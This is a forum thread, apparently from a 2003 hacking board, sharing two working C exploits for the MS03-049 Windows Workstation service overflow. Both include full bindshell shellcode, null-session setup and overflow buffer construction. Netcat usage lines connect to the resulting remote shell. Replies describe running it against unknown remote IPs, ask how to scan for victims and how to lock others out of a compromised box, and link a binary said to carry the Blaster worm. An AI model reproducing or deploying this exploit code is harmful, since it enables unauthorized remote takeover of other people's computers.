creep01
Thanks to Dinos for making the changes in the source.

The difference from wirepair's version is that the RPC part is automated: no need to run net use and all the rest.

Also a fix in the header files, plus a few more things.

QUOTE

/* Update: WinXP sp1 is stripping \x89 characters, this is why my exploit won't work in sp1. I'm currently looking
 * to fix this... if you pop in yer own sc without nulls or x89 bytes it will work, jmp esp call is the same between sp0 and sp1.
 * ms03-049 by wirepair, pretty sweet find, although I can only get this to work on XPsp0. Win2k responds with like
 * op rng error stating it doesn't know what the hell I'm requesting. eEye seemed to allude to the fact that 'only xp has these
 * undocumented APIs' or something, anyways sc is from oc.192's awesome rpc exploit. This is beta and the code is friggen disgusting.
 * It was a hack job basically, but it works and I've tested it on 2 XP no sp machines. I'll add the 'change bindshell port' later.
 * It shouldn't crash the box either, at least in my cases exitthread does the trick.
 * This code proves how little I know about crazy windows string stuff if you see a bunch of crap that makes no sense like weird casting.
 * It's because I have no idea heh.
 * Only works against SP0 at the moment.... working on sp1 heh.
 * Usage:
 * C:\>net use \\ip.ip.ip.ip\IPC$ "" /u:""
 * C:\>0349 ip.ip.ip.ip
 * open new cmd:
 * C:\>nc ip.ip.ip.ip 4444
 *
 * *** I can't understand the need for so many commands since you can put them here.
 * *** Just adding, making it more "human" - Dinos.
 */

#include <windows.h>
#include <winbase.h>
#include <lm.h>
// #include "LMJoin.h" //prolly don't need this but what the hey.
#include <winnls.h>
#include <stdio.h>
#include <stdlib.h>   // exit()
#include <string.h>

#pragma comment(lib, "mpr")


typedef VOID (*MYPROC)(IN  LPCWSTR Server OPTIONAL,
    IN  LPCWSTR AlternateName,
    IN  LPCWSTR DomainAccount OPTIONAL,
    IN  LPCWSTR DomainAccountPassword OPTIONAL,
    IN  ULONG Reserved
    );
int main(int argc, char **argv) {
    char overwrite[2045] = "";
    int ret;
    char sc[] =
"\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
    "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
    "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
    "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
    "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
    "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
    "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
    "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
    "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
    "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
    "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
    "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
    "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
    "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
    "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
    "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
    "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
    "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
    "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
    "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
    "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
    "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
    "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
    "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
    "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
    "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
    "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
    "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
    "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
    "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
    "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
    "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
    char exp_buf[2045+4+16+501];
    char ip[30];
    LPWSTR ipl[60];
    DWORD jmpesp = 0x7518A747;
    LPWSTR unicode[(2045+4+16+501)*2];
    int i = 0;
    int len = 0;
    HINSTANCE hinstLib;
    NETRESOURCE netRes1;
    MYPROC ProcAddr;
    BOOL fFreeResult, fRunTimeLinkSuccess = FALSE;

    if (argc < 2) {
        fprintf(stderr, "ms03-049 wkksvc.dll buffer overflow by wirepair.\n");
        fprintf(stderr, "easy adds - Dinos. \n");
        fprintf(stderr, "Usage: %s <ip>\n", argv[0]);
        // fprintf(stderr, "C:\\>net use \\\\ip.ip.ip.ip\\IPC$ \"\" /u:\"\"\n"); // not needed any more, the null session is set up below
        fprintf(stderr, "\nC:\\>0349 ip.ip.ip.ip\n"
                        "open new cmd:\n"
                        "C:\\>nc ip.ip.ip.ip 4444\n"
                        "If it doesn't hang the ip's invalid or it did not work\n");
        exit(1);
    }

    printf("Attacking: %s\n", argv[1]);

    // do the connect: null session to the target's IPC$ share
    sprintf(ip, "\\\\%s\\ipc$", argv[1]);

    netRes1.lpLocalName = NULL;
    netRes1.lpProvider = NULL;
    netRes1.dwType = RESOURCETYPE_ANY;
    netRes1.lpRemoteName = ip;

    ret = WNetAddConnection2(&netRes1, "", "", 0);
    if (ret != 0) {
        fprintf(stderr, "Null session failed \n");
        return 1;
    } else {
        printf("Null session ok\n");
    }
    // null session done

    _snprintf(ip, 24, "\\\\%s", argv[1]); // i should've used vsprintf() >:)
    hinstLib = LoadLibrary("netapi32.dll");

    memset(overwrite, 0x41, 2000);
    memset(overwrite+2000, 0x90, 44);
    memcpy(exp_buf, overwrite, 2044);
    memcpy(exp_buf+2044, &jmpesp, 4);
    memset(exp_buf+2048, 0x90, 16);
    memcpy(exp_buf+2064, sc, sizeof(sc));

    MultiByteToWideChar(CP_ACP, NULL, ip, 30, (unsigned short*)ipl, 60);
    wprintf(L"\n%s", ipl);
    len = MultiByteToWideChar(CP_ACP, NULL, exp_buf, sizeof(exp_buf), (unsigned short *)unicode, sizeof(unicode));

    if (hinstLib != NULL) {
        ProcAddr = (MYPROC) GetProcAddress(hinstLib, "NetAddAlternateComputerName");
        if (NULL != ProcAddr) {
            fRunTimeLinkSuccess = TRUE;
            printf("\nGetProcAddr: %x\n", *ProcAddr);
            printf("Sending exploit, you should be able to nc to the host\n");
            (ProcAddr)((LPCWSTR)ipl, (const unsigned short *)unicode, NULL, NULL, 0);
        } else {
            printf("\nprocaddr null\n");
        }

        fFreeResult = FreeLibrary(hinstLib);
    } else {
        printf("hinst null\n");
    }

    return(0);
}

TmouR
Great work! Thanks for the modification.
jaxgough
Cool
PrarieDog
will test it out....thx
maxxis
What is the scan port?
isaiah
Maxxis, use your brains m8. About 2 threads down, there is a whole page full of information on the original exploit. Just take some time m8, and settle down.

It's 139...

Thanks for the hard work revising, guys!

Will test it, and let you know the results.
Btbw
thx for this! But how can we scan for this exploit?
isaiah
Works locally on my computer.


Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.


C:\>0349 127.0.0.1
Attacking: 127.0.0.1
Null session ok

\\127.0.0.1
GetProcAddr: 71c59530
Sending exploit, you should be able to nc to the host

telnet 127.0.0.1 4444

Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32
Mr_X
I made 2 functions you can add to this source:
extract_nc, which creates "nc.exe"
CALL: extract_nc();
exec_nc, which executes "nc ip_specified_in_parameter 444" and then deletes nc.exe
CALL: exec_nc(argv[1]) // (call it inside main)

The file in the attachment contains what I've coded.
isaiah
Nice Job Mr_X!

Will test it out
tolf
nice one... Tell "dino" nice...
yeyo
thanks 4 the tools. let's try it
decline
This is a nice tool man. Looking forward to the next version hehe

Thanks
GhostCow
great post, I'm gonna test it right away...
edit: man, it doesn't seem to work for me or any of my friends... oh well!
enlightnr
I'm happy to reply to this thread. GW Creep!
axl
tested it!!!

works fine on remote XP sp0!
haxor2k3
Yep, looks like it's working
wicked
Lookin Good

Bloodhound.Virii Detected by AV..

Wkd..
subzero
lol works 4 me, only tried 6

nice job
wicked
How About a Chinese Version...??

Very Oriental....

CODE
Author: sbaa, author's homepage: sbaa.3322.org
bgtw: the author is an expert, and a good person too :)
Overflow code for ms03049; after modification, tested successfully on 2k
Compiled binary: http://sbaa.3322.org/public1/tool/ms03049.rar

If run against 2k, the target must not be on an NTFS partition.
If run against XP there should be no such restriction, but I haven't tested it.
The jump is jmp ebx; the current address is common to both 2k and XP.
I originally wanted to use the XP dll under 2k, but ntdll.dll could not be
replaced successfully. The ideal approach would be to capture the packets and
implement the overflow without using the Windows API, but I have no time for that right now.

#include <windows.h>
#include <lm.h>
#include <stdio.h>
#include <string.h>
//#include <winsock.h>


typedef int (*MYPROC)(LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR, ULONG);


#define SIZE 2048

#pragma comment(lib,"mpr.lib")
//#pragma comment(lib,"netapi32.lib")
#pragma comment(lib,"Ws2_32.lib")
//#pragma comment(lib,"user32.lib")

unsigned char shellcode[] =
/* bindshell no RPC crash, defineable spawn port */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";



int main(int argc, char **argv)
{
    int ret = 0;
    HINSTANCE hInstance;
    MYPROC procAddress;
    char szBuffer[SIZE];
    NETRESOURCE netResource;
    int i = 0;

    unsigned short lportl = 1234; /* drg */
    char lport[5] = "\x00\xFF\xFF\x8b"; /* drg */

    char host[30];
    LPSTR hostipc[40];
    LPWSTR hostl[60];

    if (argc < 2) {
        printf("Windows Workstation ms03-049 wkksvc.dll buffer overflow \n"
               "bug discovered by eEye,code by Hanabishi,shellcode by oc.192 \n"
               " Modified by sbaa(sbaa@163.net) 2003/11/14 ver 0.1\n"
               " Usage: %s IP \n"
               " nc Ip 1234\n", argv[0]);
        return 0;
    }
    sprintf(host, "\\\\%s", argv[1]);
    sprintf((char *)hostipc, "%s\\ipc$", host);

    netResource.lpLocalName = NULL;
    netResource.lpProvider = NULL;
    netResource.dwType = RESOURCETYPE_ANY;
    netResource.lpRemoteName = (char *)hostipc;   // e.g. "\\\\192.168.6.7\\ipc$"

    ret = WNetAddConnection2(&netResource, "", "", 0); // attempt a null session
    if (ret != 0) {
        fprintf(stderr, "[-] WNetAddConnection2 failed\n");
        // return 1;
    }

    hInstance = LoadLibrary("netapi32");
    if (hInstance == NULL) {
        fprintf(stderr, "[-] LoadLibrary failed\n");
        return 1;
    }

    procAddress = (MYPROC)GetProcAddress(hInstance, "NetAddAlternateComputerName"); // up to you to check NetAddAlternateComputerName
    if (procAddress == NULL) {
        fprintf(stderr, "can't find NetAddAlternateComputerName (you are not xp(2003)) \n");
        // return 1;
        procAddress = (MYPROC)GetProcAddress(hInstance, "NetValidateName"); // fall back to NetValidateName
        if (procAddress == NULL) {
            fprintf(stderr, "can't find NetValidateName!\n");
            return 1;
        }
    }

    memset(szBuffer, 0x90, sizeof(szBuffer));
    /*
    for (i = 0; i < SIZE-4; i = i+4) {
        if ((i+i/256)%256 != 0) memset(szBuffer+i, i+i/256, 1);
        if ((i+1)%256 != 0) memset(szBuffer+i+1, i+1, 1);
        if ((i+2)%256 != 0) memset(szBuffer+i+2, i+2, 1);
        if ((i+3)%256 != 0) memset(szBuffer+i+3, i+3, 1);
    }
    */
    lportl = htons(lportl);
    memcpy(&lport[1], &lportl, 2);
    *(long*)lport = *(long*)lport ^ 0x9432BF80;
    memcpy(&shellcode[471-48], &lport, 4);
    memcpy(szBuffer, shellcode, sizeof(shellcode) - 1);

    memcpy(szBuffer+1851, "\x1b\x4a\xfa\x7f", 4);
    memcpy(szBuffer+2017, "\x1b\x4a\xfa\x7f", 4);

    szBuffer[SIZE-1] = 0;

    MultiByteToWideChar(CP_ACP, NULL, host, -1, (unsigned short*)hostl, 60);

    try {
        ret = (procAddress)((LPCWSTR)hostl, (LPCWSTR)szBuffer, NULL, NULL, 0);
    }
    catch (...) {
    }

    //ret=NetValidateName(hostl, szBuffer, NULL, NULL, 0);

    printf("%d\n", ret);
    WNetCancelConnection2(netResource.lpRemoteName, 0, TRUE);
    FreeLibrary(hInstance);
    return 0;
}


For the description and the patch, see
http://www.microsoft.com/technet/security/bulletin/MS03-049.asp


Note: Below File Has Win32.Blaster Virii...



|CraZy|
nice work.. tested, but guess I'm unlucky

C:\>0349 *.*.2.89
0349 *.*.2.89
Attacking: *.*.2.89
Null session ok

\\*.*.2.89
procaddr null

C:\>nc *.*.2.89 4444

C:\>
timeout
tested ~20 ips....none worked for me
Darklance
Cool shit! Going to test it
Tool
where can I get nc, or what is it?
DJVASTVASTY2K
@Tool

You Can Get It Here

Big Thanks 2 Mr X 4 Providing The Modified Bat Nc

http://www.governmentsecurity.org/forum/in...e=post&id=22795

Best Regards

Adam

Vast Gsm
T-BoNe
mistell
jim_bob2003
nc = netcat
hifil0wlife
Did not work for me. How old is this really? SP0? Do we really need more exploits for it?........
Divx_dude
Nice dude, going to test it right away!

Anybody got any results yet?
--Elite--
Any1 have something TESTED & WORKED for 2kSP4 / XPSP1?

thnx all friends.
ivan288
If you read it, it says that it only works for SP0 and that he is working on SP1.
SLiM577
Ermmm, in the code it says

Usage:
C:\>net use \\ip.ip.ip.ip\IPC$ "" /u:""
C:\>0349 ip.ip.ip.ip
open new cmd:
C:\>nc ip.ip.ip.ip 4444

I'm trying to test this on my box; should I do

Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\SLiM>net use \\127.0.0.1\IPC$ "" /u:""
The command completed successfully.

C:\Documents and Settings\SLiM>0349 127.0.0.1
Attacking: 127.0.0.1
Null session ok

\\127.0.0.1
GetProcAddr: 71c59530
Sending exploit, you should be able to nc to the host

Now at this point, do I open a new cmd and type

nc.exe 127.0.0.1 4444

or

telnet 127.0.0.1 4444

low_rider
thnx mate, will try it
studnikov
I'm gonna try this.. thanks again
Tool
Is there any way to secure it so that after you get on, no one else can? thanks